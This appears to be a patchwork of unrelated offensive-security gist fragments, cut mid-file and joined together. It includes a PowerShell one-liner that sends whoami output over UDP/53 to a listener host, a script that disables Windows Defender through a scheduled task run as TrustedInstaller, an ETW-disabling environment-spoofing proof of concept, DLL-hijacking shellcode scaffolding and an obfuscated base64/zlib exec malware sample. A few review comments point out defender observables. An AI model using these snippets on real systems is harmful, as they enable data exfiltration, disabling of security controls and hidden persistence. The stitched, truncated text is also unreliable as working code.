Persist data in UEFI NVRAM variables.
- Stealthy way to store secrets and other data in UEFI.
- Will survive a reimaging of the operating system.
import os | |
import subprocess | |
# See: https://blogs.msmvps.com/erikr/2007/09/26/set-permissions-on-a-specific-service-windows/ | |
# Per-service metadata collected later in the script, keyed by service name
# (the exact value schema is populated by code outside this excerpt).
svcinfo = dict()

# Module-level write handle on the null device; intended as a sink for
# subprocess output. Opened once for the life of the process and never closed.
FNULL = open(os.devnull, mode='w')
win10builtin = ['AppVClient', 'ClickToRunSvc', 'COMSysApp', 'diagnosticshub.standardcollector.service', | |
'msiserver', 'ose', 'perceptionsimulation', 'SecurityHealthService', 'Sense', | |
'SensorDataService', 'SgrmBroker', 'Spooler', 'ssh-agent', 'TieringEngineService', |
# On your host:
# $ nc -lnvup 53
# Replace <HOSTIP> with ip of the listening machine
# Opens a UDP socket, "connects" it to <HOSTIP>:53 and sends the output of `whoami`
# as a single ASCII datagram; nothing is read back, so there is no reply handling.
# NOTE(review): from a defender's side, the observable is powershell.exe emitting UDP/53
# traffic to a host that is not a configured resolver — worth an egress/DNS-port alert.
powershell -nop -c "$s=New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::UDP);$s.Connect((New-Object System.Net.IPEndPoint([system.net.IPAddress]::Parse(\"<HOSTIP>\"),53)));$s.send(([System.Text.Encoding]::ASCII).GetBytes((whoami)));"
// Dll Hijacking via Thread Creation | |
// Author - Vivek Ramachandran | |
// Learn Pentesting Online -- http://PentesterAcademy.com/topics and http://SecurityTube-Training.com | |
// Free Infosec Videos -- http://SecurityTube.net | |
#include <windows.h> | |
#define SHELLCODELEN 2048 |
// A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on | |
// setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET. | |
// | |
// Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables, | |
// and then resuming the process. | |
// | |
// (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/) | |
#define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0" | |
#define INJECT_PARAM_LEN 43 |
# Command line for the task action: sets the WinDefend service start type to disabled, then
# rewrites its security descriptor so that Everyone (WD) and Owner Rights (OW) are denied
# generic-all access (the D:(D;;GA;;;WD)(D;;GA;;;OW) SDDL string).
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
# Wraps the command line in a scheduled-task action running cmd.exe and registers it as 'TestTask'.
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a
# Task Scheduler COM interface, connected to the local machine.
$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()
# Service principal and root task folder; how they are applied to the task is not visible
# in this excerpt — presumably the task is re-registered under this principal further down.
$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
# NOTE(review): each step here leaves an audit trail a defender can key on — scheduled-task
# registration, a service start-type change and an sdset on WinDefend are all logged events.
GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
# Modified to include support for CommandLine, File Hashes, File Paths, Signing Certificates | |
# Copyright (c) 2020 Jai Minton. All rights reserved. | |
# Copyright (c) 2014 Atif Aziz. All rights reserved. | |
# | |
# Licensed under the Apache License, Version 2.0 (the "License"); | |
# you may not use this file except in compliance with the License. | |
# You may obtain a copy of the License at | |
# | |
# http://www.apache.org/licenses/LICENSE-2.0 | |
# |
#include "stdafx.h" | |
int main() | |
{ | |
ICLRMetaHost *metaHost = NULL; | |
IEnumUnknown *runtime = NULL; | |
ICLRRuntimeInfo *runtimeInfo = NULL; | |
ICLRRuntimeHost *runtimeHost = NULL; | |
IUnknown *enumRuntime = NULL; | |
LPWSTR frameworkName = NULL; |
## uploaded by @JohnLaTwC | |
## sample hash: b06fa24126eb1d6ed670fea4ea4252e4a8f4a460a2c3c7727d82eb1216fc4937 | |
import zlib, base64 | |
exec(zlib.decompress(base64.b64decode('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 |